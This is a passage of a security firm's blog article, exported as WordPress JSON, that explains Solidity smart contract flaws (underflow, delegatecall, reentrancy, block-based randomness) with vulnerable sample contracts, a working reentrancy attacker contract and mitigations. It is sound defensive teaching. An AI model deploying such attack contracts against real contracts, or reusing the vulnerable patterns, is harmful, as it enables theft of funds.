#808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">The <\/span><span style=\"font-weight: 400; color: #ff0000;\">require<\/span> <span style=\"font-weight: 400;\">condition in <\/span><span style=\"font-weight: 400;\">transfer <\/span><span style=\"font-weight: 400;\">function might<\/span> <span style=\"font-weight: 400;\">look correct at first glance, but only until you realize that operations between two uints produce unit value. It means that \u00a0<\/span><span style=\"font-weight: 400;\">balances[msg.sender] &#8211; _value &gt;= 0 <\/span><span style=\"font-weight: 400;\">condition is always satisfied because unit minus unit operation produces unit and unit is always greater or equal to 0<\/span><span style=\"font-weight: 400;\">. <\/span><span style=\"font-weight: 400;\">A<\/span> <span style=\"font-weight: 400;\">malicious user can spend more funds than he owns, because of the contract\u2019s faulty <\/span><span style=\"font-weight: 400; color: #ff0000;\">require<\/span> <span style=\"font-weight: 400;\">condition. Furthermore, a malicious user can take possession of a very large amount of tokens by transferring more tokens than he owns, because his balance will underflow to the substantial integer value. E.g., if a malicious user owns 100 tokens and he tries to transfer 101 tokens, then he will end up with 100 &#8211; 101 tokens which equals to maximum uints value (2\u00b2\u2075\u2076-1) tokens.<\/span><\/p>\n<p><b>Real World Example:<\/b><span style=\"font-weight: 400;\"> Developers responsible for POWH Coin didn\u2019t secure uint operations in withdrawing logic against overflow\/underflow, and a unknown hacker was able to withdraw an infinite number of PoWH\u2019s tokens and drained whole contract\u2019s balance equal to 2000 ETH (~2.3M USD at the time).<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Watch out for variables with unsigned integer type and keep in mind the possibility of overflow and underflow.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> It is recommended to use OpenZeppelin\u2019s <\/span><a href=\"https:\/\/github.com\/OpenZeppelin\/zeppelin-solidity\/blob\/master\/contracts\/math\/SafeMath.sol\"><span style=\"font-weight: 400;\">SafeMath library<\/span><\/a><span style=\"font-weight: 400;\"> to avoid overflows and underflows.<\/span><\/p>\n<p><b>Note:<\/b><span style=\"font-weight: 400;\"> Overflow and underflow behavior might become a problem of the past if the future version of Solidity is changed to throw an exception instead of allowing unsigned integers to overflow\/underflow. There is an ongoing <\/span><a href=\"https:\/\/github.com\/ethereum\/solidity\/issues\/796\"><span style=\"font-weight: 400;\">discussion<\/span><\/a><span style=\"font-weight: 400;\"> about this topic in Ethereum community.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cUsing external libraries is safe\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers low-level <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> function which allows contract A (calling contract) to execute a function of contract B (called contract) with the context of the contract A. This function is very convenient when there is need to run\/reuse code of the external library, but it poses a significant security risk because it grants called contract\/library full access to state of calling contract.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let&#8217;s use following example to manifest how an attacker can misuse <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> in naive contract to steal balance or take ownership of naive contract via dangerous library.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract DangerousLibrary {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public owner;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function safeAndUsefulFunction1() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ do something safe and useful<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function safeAndUsefulFunction2() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ do something safe and useful<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function dangerousFunction1() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0selfdestruct(msg.sender);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function dangerousFunction2() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0owner = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract NaiveContract { <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public owner;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address libraryAddress;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0constructor(address _libraryAddress) public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0libraryAddress = _libraryAddress;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0owner = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function callSafeAndUsefulLibraryFunction() public{<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0libraryAddress.delegatecall(msg.data); <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">When attacker calls NaiveContract\u2019s <\/span><span style=\"font-weight: 400;\">callSafeAndUsefulLibraryFunction<\/span><span style=\"font-weight: 400;\"> function with call data that contains a signature one of the dangerous functions of the dangerous library, then the attacker can destroy the instance of NaiveContract and send the balance of NaiveContract to himself or can take ownership of naive contract.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The example of call data that would invoke dangerous function is: <\/span><span style=\"font-weight: 400;\">bytes4(keccak256(&#8222;dangerousFunction1()&#8220;))<\/span><\/p>\n<p><b>Real World Example: <\/b><span style=\"font-weight: 400;\">This type of attack was used in <\/span><a href=\"https:\/\/medium.freecodecamp.org\/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce\"><span style=\"font-weight: 400;\">Parity Hack<\/span><\/a><span style=\"font-weight: 400;\"> where unknown attacker stole 150,000 ETH (~30M USD at the time).<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Never use <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> with arbitrary data in your contract. <\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Avoid using <\/span><span style=\"font-weight: 400; color: #ff0000;\">delegatecall<\/span><span style=\"font-weight: 400;\"> if you can and if you decide to use it then think twice if the library you are about to call can be trusted.<\/span><\/p>\n<h2><\/h2>\n<h2><span style=\"font-weight: 400;\">\u201cSending funds with call function is safe\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers 3 functions to send funds: <\/span><span style=\"font-weight: 400; color: #ff0000;\">send, transfer <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> call<\/span><span style=\"font-weight: 400;\">. The most significant difference between first two and the third one is that <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> by default forwards all remaining gas. It means that if the receiver of funds is contract, then the receiving payable function can use forwarded gas to execute additional logic\/code.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The following contract explains how usage of <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> can lead to serious security flaws.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Bank {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function deposit() public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] += msg.value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)());<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function balanceOf(address _who) public view returns (uint) {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0return balances[_who];<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function getTotalBalance() public view returns (uint){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0return address(this).balance;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0} <\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">Bank contract\u2019s <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function has two weaknesses:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It uses <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> to send funds<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It reduces message sender\u2019s balance after it sends requested amount to the message sender<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Combination of described weaknesses makes <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function vulnerable to reentrancy attack.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">An attacker would be able to drain Bank contract\u2019s balance via reentrancy attack with following malicious contract:<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Bank {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function deposit() external payable;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) external;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0Bank bank;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0constructor(address _address_to_attack) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank = Bank(_address_to_attack);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function deposit() public payable{<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.deposit.value(msg.value)();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.withdraw(_amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0} <\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function() payable public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (address(bank).balance &gt;= 1 ether){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bank.withdraw(1 ether);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function getBalance() public view returns (uint){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return address(this).balance;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0} \u00a0<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">An attacker would first deploy MaliciousContract contract with the address of Bank contract instance as constructor <\/span><span style=\"font-weight: 400;\">address_to_attack <\/span><span style=\"font-weight: 400;\">parameter. Then he would deposit 1 ETH to Bank contract instance via <\/span><span style=\"font-weight: 400;\">deposit<\/span><span style=\"font-weight: 400;\"> function of MalicousContract, which would increase MaliciousContract instance balance in Bank contract to 1 ETH. Now MaliciousContract is ready to execute reentrancy attack. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">MaliciousContract would initiate reentrancy attack by withdrawing 1 ETH from Bank via it\u2019s <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function. When Bank contract sends requested 1 ETH to MalicousContract via low-level <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function in <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function, then MalicousContract receiving function (fallback function) is forwarded all remaining gas. It can invoke Bank contract\u2019s <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function again, which would send one additional ETH to MalicousContract because MalicousContract\u2019s balance in Bank contract hasn\u2019t been decreased yet. This recursive invocation of Bank\u2019s <\/span><span style=\"font-weight: 400;\">withdraw <\/span><span style=\"font-weight: 400;\">function from<\/span> <span style=\"font-weight: 400;\">MalicousContract\u2019s payable fallback function would stop once Bank\u2019s balance is empty or transaction runs out of gas.<\/span><\/p>\n<p><b>Real World Hack: <\/b><span style=\"font-weight: 400;\">This type of attack was used during <\/span><a href=\"http:\/\/hackingdistributed.com\/2016\/06\/18\/analysis-of-the-dao-exploit\/\"><span style=\"font-weight: 400;\">TheDAO hack<\/span><\/a><span style=\"font-weight: 400;\"> when unknown attacker stole 3.5M ETH (~50M USD at the time). This event led to Ethereum hard fork which produced 2 separate coins: Ethereum and Ethereum classic. <\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Sending funds via <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function is dangerous because it forwards all remaining gas which allows the attacker to run potentially malicious code in the payable function. <\/span><\/p>\n<p><b>How to mitigate:<\/b><\/p>\n<ol>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Use <\/span><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> or <\/span><span style=\"font-weight: 400; color: #ff0000;\">transfer<\/span><span style=\"font-weight: 400;\"> functions instead of <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> to send funds, because they do not forward enough gas to execute malicious code. <\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If you have to use <\/span><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> function (e.g., receiving function requires more than 2300 gas to execute its code), then make sure that you follow <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/v0.4.21\/security-considerations.html#re-entrancy\"><span style=\"font-weight: 400;\">Checks-Effects-Interactions<\/span><\/a>.\u00a0<span style=\"font-weight: 400;\">Message sender\u2019s balance should be adjusted before funds are sent in order to make <\/span><span style=\"font-weight: 400;\">withdraw<\/span><span style=\"font-weight: 400;\"> function of Bank contract \u201creentrancy-safe\u201d.<\/span><\/li>\n<\/ol>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount); \u00a0\u00a0\u00a0\/\/ <\/span><b>checks<\/b><\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount; \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ <\/span><b>effects<\/b><\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)()); \u00a0\u00a0\/\/ <\/span><b>interactions<\/b><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">\u00a0 \u00a0 \u00a0 3. Another option is to utilize mutex(exclusive lock) in withdraw function which would ensure that withdraw function cannot be re-entered until the balance is adjusted and the lock is released.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\"> \u00a0function withdraw(uint _amount) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(!is_withdrawing[msg.sender]);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] &gt;= _amount);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0is_withdrawing[msg.sender] = true;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(msg.sender.call.value(_amount)());<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _amount;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0is_withdrawing[msg.sender] = false;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><\/h2>\n<h2><span style=\"font-weight: 400;\">\u201cIt is easy to generate random number\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">To generate a pseudo-random number, you need seed. Hiding your seed on blockchain is not possible, because everything is visible to everyone. It might be tempting to use one of the apparently \u201chard-to-predict\u201d block variables &#8211; like block-hash and block timestamp as a source of entropy, but these variables can be to the certain extent predicted and influenced by miners. Malicious miner can precalculate block-hash or set block timestamp to the desired value to exploit contract\u2019s function relying on the unpredictability of block variables.<\/span><\/p>\n<p><b>Real World Hack:<\/b><span style=\"font-weight: 400;\"> Creators of <\/span><a href=\"https:\/\/smartbillions.com\/\"><span style=\"font-weight: 400;\">SmartBillions <\/span><\/a><span style=\"font-weight: 400;\">used <\/span><a href=\"https:\/\/solidity.readthedocs.io\/en\/v0.4.24\/units-and-global-variables.html#block-and-transaction-properties\"><span style=\"font-weight: 400;\">block.blockhash<\/span><\/a><span style=\"font-weight: 400;\"> function to generate lottery numbers and <\/span><a href=\"https:\/\/www.reddit.com\/r\/ethereum\/comments\/74d3dc\/smartbillions_lottery_contract_just_got_hacked\/\"><span style=\"font-weight: 400;\">they lost 400ETH<\/span><\/a><span style=\"font-weight: 400;\"> (~125k USD at the time) due to this mistake.<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> It is challenging to generate a random number on the blockchain.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Do not use block variables (block-hash, block timestamp, etc.) to generate random numbers. <\/span><a href=\"https:\/\/blog.positive.com\/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620\"><span style=\"font-weight: 400;\">Here<\/span><\/a><span style=\"font-weight: 400;\"> you can read more about why not to use block variables when aiming for randomness.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h1><span style=\"font-weight: 400;\">Conclusion<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">The success of Ethereum and Solidity is primarily determined by the user\u2019s level of confidence in its ability to operate safely and keep funds secured. Every hacked smart contract and every token stolen leaves hard to fade scars on Ethereum\u2019s and Solidity\u2019s reputation. In order to deliver smart contracts with the highest security standards, it is necessary for a smart contract developer to:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Stay up-to-date with latest developments in Solidity language and Ethereum platform<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Follow best practices, security recommendations and smart contract security patterns from Solidity documentation and leading smart contract security organizations \u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Employ security audits performed by professional external smart contract auditors<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">We offer comprehensive <a href=\"https:\/\/nethemba.com\/services\/application-security\/smart-contracts-security-audit\/\" target=\"_blank\" rel=\"noopener\"><strong>Smart contracts security audit<\/strong><\/a>. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">If you are interested in getting your smart contract audited by the team of smart contract experts, please contact us at <\/span><a href=\"mailto:sales@nethemba.com\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">sales@nethemba.com<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. With billions of dollars at play and relatively low-level of [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[13],"tags":[1177,1178,1179,1180,1181,34,1182,1183,1184,1185],"class_list":["post-2791","post","type-post","status-publish","format-standard","hentry","category-uncategorized-sk","tag-blockchain-sk","tag-crypto-sk","tag-cryptocurrencies-sk","tag-ethereum-sk","tag-ico-sk","tag-it-security","tag-security-audit-sk","tag-security-vulnerabilities-in-solidity-sk","tag-smart-contracts-sk","tag-solidity-sk"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Summary of the common smart contracts vulnerabilities - Nethemba<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"sk_SK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Summary of the common smart contracts vulnerabilities - Nethemba\" \/>\n<meta property=\"og:description\" content=\"Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. With billions of dollars at play and relatively low-level of [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"Nethemba\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nethemba\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-25T07:49:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-05-28T05:58:57+00:00\" \/>\n<meta name=\"author\" content=\"Pavol Lupt\u00e1k\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@nethemba\" \/>\n<meta name=\"twitter:site\" content=\"@nethemba\" \/>\n<meta name=\"twitter:label1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pavol Lupt\u00e1k\" \/>\n\t<meta name=\"twitter:label2\" content=\"Predpokladan\u00fd \u010das \u010d\u00edtania\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 min\u00fat\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"},\"author\":{\"name\":\"Pavol Lupt\u00e1k\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"headline\":\"Summary of the common smart contracts vulnerabilities\",\"datePublished\":\"2018-05-25T07:49:34+00:00\",\"dateModified\":\"2018-05-28T05:58:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"},\"wordCount\":3221,\"commentCount\":0,\"keywords\":[\"blockchain\",\"crypto\",\"cryptocurrencies\",\"Ethereum\",\"ICO\",\"IT security\",\"security audit\",\"security vulnerabilities in Solidity\",\"smart contracts\",\"Solidity\"],\"articleSection\":[\"Uncategorized @sk\"],\"inLanguage\":\"sk-SK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\",\"url\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\",\"name\":\"Summary of the common smart contracts vulnerabilities - Nethemba\",\"isPartOf\":{\"@id\":\"https:\/\/nethemba.com\/de\/#website\"},\"datePublished\":\"2018-05-25T07:49:34+00:00\",\"dateModified\":\"2018-05-28T05:58:57+00:00\",\"author\":{\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\"},\"breadcrumb\":{\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb\"},\"inLanguage\":\"sk-SK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/nethemba.com\/sk\/domov\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Summary of the common smart contracts vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nethemba.com\/de\/#website\",\"url\":\"https:\/\/nethemba.com\/de\/\",\"name\":\"Nethemba\",\"description\":\"We care about your 